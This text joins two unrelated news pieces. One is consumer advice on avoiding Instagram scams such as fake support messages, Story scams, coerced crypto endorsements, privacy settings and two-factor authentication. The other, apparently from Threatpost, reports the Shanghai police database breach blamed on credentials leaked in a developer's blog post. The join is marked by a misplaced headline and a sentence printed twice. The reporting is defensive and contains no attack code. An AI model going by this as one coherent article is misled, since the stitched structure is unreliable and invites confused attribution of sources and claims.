“When it comes to spotting a scam on Instagram, people should look out for messages asking you to click on a link, even if they appear to come from a friend, a trusted brand, or Instagram itself,” Barker adds. Scam messages often include typos, poor English, or want you to click on a link taking you away from the app. They often also come from recently created accounts.

Scammers have been spotted using Instagram’s logo and branding to send tech, verification, or security support messages to people via DMs. These are all fakes. Instagram says it will never send you direct messages about your account. (You can see official emails from Instagram in the app’s settings.) “Look out for posts about giveaways, gift cards, and investment schemes, as these are common tactics for criminals,” Barker says. If a brand is contacting you from an unverified account, you should be very cautious about replying.

Scams also come through Instagram Stories. “Fraudsters abuse the Instagram Stories feature, posting scams there that autodelete after 24 hours,” says Chris Boyd, lead malware intelligence analyst at cybersecurity firm Malwarebytes. “The scam is hidden behind their profile picture; you won't see it in the main collection of images,” Boyd says, adding that this move helps to keep the scam away from Instagram feeds and automatically vanish, making it harder to detect.

While competition scams and attempts to access people’s accounts aren’t new, Instagram has also seen a rise in “hostage-style” scams, where people are forced to post videos telling people to invest in bitcoin or other cryptocurrencies to get their hacked accounts returned. Multiple Instagram users, as reported by _VICE_, have been pressured into recording videos after their accounts were hacked. Other people report losing thousands to Instagram scammers. The incidents highlight why you shouldn’t trust every account you follow.

"Cryptocurrency scams are quick methods to whisk users away from the relative safety of the Instagram platform and onto trading sites where Instagram can't help,” Boyd says. “Extortion-driven cryptocurrency endorsements are a smart move on the part of the scammer. Leveraging people you know and trust in visual mediums to promote something is always going to be more convincing than a random email.”

How to Avoid Getting Scammed

There are things you can do to avoid getting hacked and the worst scams—these are a mixture of security settings and slight behavioral tweaks. Thankfully the process isn't too complicated, and small changes can make a big difference.

First, as mentioned earlier, you should avoid clicking on links that are sent to you, especially from accounts that you don’t know personally, or if someone you know sends a URL that seems out of character. “Following an account for many months still may not make it an authentic account,” Moore says.

If an account doesn’t seem right, you can look into its origins. “Research accounts to decide if they can be trusted—you can find information, such as when an account was created, by clicking **About this Account** under a profile. You can also check whether accounts are verified,” Barker says.

Second, your default setting should be one of suspicion. If your Instagram account is public, anyone can see your posts and message you. By limiting who can message you, you reduce the chances of being exposed to scams. To change whether your account is public or private, visit **Settings**, **Privacy**, and toggle your account to **Private**.

While you are in privacy settings, you should also limit who can message you. Under **Messages** there are options to send received messages to a Message Requests folder, and you can stop accounts that don’t follow you from messaging you through the **Others on Instagram** menu. For more details, see our guides on how to limit who can contact you on Instagram and the steps you can take to stop tracking and improve your Instagram privacy.

Arguably the biggest way you can protect your account from being taken over by scammers is by using a unique, strong password—stored in a password manager—and turning on multifactor authentication. Enabling multifactor authentication requires anyone trying to log in to your account to use a login code or click a notification in addition to using your password—and it's effective against account takeovers.

To turn on two-factor authentication on Instagram, tap on your profile picture in the bottom right corner of your phone, then tap on the hamburger menu. Go to **Settings**, then **Security**, then **Two-Factor Authentication**. You can turn on security protection there. If, in the worst-case scenario, your Instagram account does get hacked, here’s what you should do.

How to Avoid the Worst Instagram Scams

A developer appears to have divulged credentials to a police database on a popular developer forum, leading to a breach and subsequent bid to sell 23 terabytes of personal data on the dark web.

A developer appears to have divulged credentials to a police database on a popular developer forum, leading to a breach and subsequent bid to sell 23 terabytes of personal data on the dark web.

A prominent Chinese tech CEO has cited human error as the likely reason hackers got their hands on the personal data of 1 billion people in China from a Shanghai police database and then put some of it up for sale on illicit online markets.

A government developer wrote a blog post on the China Software Developer Network (CSDN) that accidentally included the credentials to the system where the data was stored, Zhao Changpeng, CEO of cryptocurrency exchange Binance, said on Twitter Monday. CSDN is one of the largest developer networks in China.

“Apparently, this exploit happened because the gov developer wrote a tech blog on CSDN and accidentally included the credentials,” Changpeng, who goes colloquially and on Twitter by the moniker “CZ,” wrote in the tweet. His post included a screenshot of the offending code that was included in the blog post.

Previously, Changpeng had tweeted that his company’s threat intelligence team detected 1 billion Chinese resident records for sale on the dark web, citing the “likely” culprit for the leak  “a bug in an Elastic Search deployment by a gov agency.” In response to the breach, Binance stepped up its user verification processes, he said.

Indeed, numerous news outlets reported Tuesday that an anonymous hacker or hacking group going by the username “ChinaDan” put up for sale last week 23 terabytes of stolen data—including names, addresses, birthplaces, national IDs, phone numbers and criminal case information of Chinese citizens—on Breach Forums, a popular cybercriminal forum. The unknown actors were asking for 10 bitcoin, or about $200,000, for the data cache.

With multiple sources confirming that the data appears to be legit, the news caused a massive stir across the security industry, with experts calling it the largest cybersecurity breach in not just the country’s history, but perhaps ever.

“If ChinaDan is telling the truth, then this is one of the biggest data breaches in history, and it was caused by poor password management,” observed Josh Stahl, security operations center analyst at BreachQuest, an incident-response security firm, in an email to Threatpost.

The upside, if there is one, is that the root cause of the breach does not indicate “some new exploit or stealthy malware, but a simple oversight of credential management,” he noted.

****Human Error in Play****

Indeed, the breach again shines a light on the most persistent security issue since the inception of computers and the internet—human error. In fact, an annual report on data breaches by Verizon–the 2022 Data Breach Investigations Report (DBIR)—cited the “human element” as responsible for 82 percent of the breaches analyzed by researchers, with 13 percent directly attributed to human error.

Since people overseeing sensitive data still can’t seem to be trusted to protect it, the incident once again demonstrates that companies need to take numerous steps beyond password-protecting systems that store data to ensure that it doesn’t fall into the wrong hands, noted a security professional.

“This is the end result of a catastrophic failure to implement basic password management and secrets management,” Craig Lurey, CTO and co-founder at cybersecurity software firm Keeper Security, told Threatpost in an email. “Secrets such as database credentials should never be hard-coded into source code, which is what caused the breach.”

He suggested that enterprise password managers enable organizations to establish strict, deliberate role-based access control (RBAC), along with privileged access to infrastructure, to protect sensitive data and secrets.

Another security expert advised organizations to establish a layered defense and behavior detection model to prevent human error from causing potentially catastrophic data leaks.

“Organizations should establish processes to continuously identify, prioritize and remediate gaps in their security monitoring and threat coverage to detect anomalous activity,” Michael Mumcuoglu, CEO and co-founder at threat coverage optimization firm CardinalOps, observed in an email to Threatpost.

****Flipping the Script****

The incident also appears to flip the script on China, a country well known as one of the biggest perpetrators of cybercrime–state-sponsored and otherwise.

Typically China tends to be the actor behind cybercriminal activity, not the victim of it—although admittedly it’s difficult to know how often Chinese citizens themselves are targeted cybercrime due to lack of transparent reporting mechanisms in that country about such activity, experts said.

But in a country with a government that notoriously collects mountains of data about its own citizens while imposing tight restrictions on what data and internet resources they themselves can access and use, it’s not surprising that some of this data would eventually fall into criminals’ hands.

And there already is precedence for high-profile data leaks that expose the personal data of Chinese citizens. In 2020, for example, sensitive data of around 2 million members of the Communist Party of China (CPC) were leaked, including official records as well as info related to their activity in global organizations.

So far, Shanghai authorities have not publicly responded to the latest data breach, nor are they responding to requests for comment, according to reports.

Tag

#intel